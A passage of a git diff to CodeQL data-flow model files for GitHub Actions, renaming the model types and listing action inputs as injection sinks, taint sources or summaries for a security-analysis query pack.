"input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465..7e0970034a5 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437..2f62f211da9 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed..f94ad242321 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe88611259..5872399881c 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520d..02c5dcd3cca 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece4..45bf0c57355 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a..4ac3492c41c 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35..a48da0cedfc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 46226863687..6ca7aa86c06 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f..11f1f10980f 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d..9ed2cb7908b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4..7f279f37a45 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4..68f434f4797 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e560730..890a47c79fc 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd..aff5c330316 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d9..8f5e22fa2d9 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e228..ff0131da99e 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc37423..1d82fb8f836 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e110..1e4cc21dd13 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a512..ba729868a04 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ec..504f0693977 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d83774231..48267b6d082 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f..26eea1d2341 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb..7993d827fa6 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d9..de48ea5a709 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c..36a9b24f089 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4..f04f8dda6c8 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d9..a37d6452d50 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d65724735..352eb51996a 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a12..44f34c11cb3 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc2187..3fd2e46296a 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e5..881374b6c90 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad1..6d77c866dc2 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48..0b27c584584 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4..911d3e57155 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a..1ac668cf55a 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fff..5cf121dcef2 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17..d946204e9b9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f..c6839a7b004 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2..9e708bbcc89 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c1560..cfb67540b17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e..7186433e6d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e6..d39aafe162f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a..a3b53b3ec96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf..2a35d22a10e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900..156d244ece2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e..fcda4b3dfec 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761f..84877f57d8c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a..dcb93d013a0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fc..4776bb79067 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a..2540e6a76ca 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b725..525064de6a9 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a1..b46d5a3ee6a 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 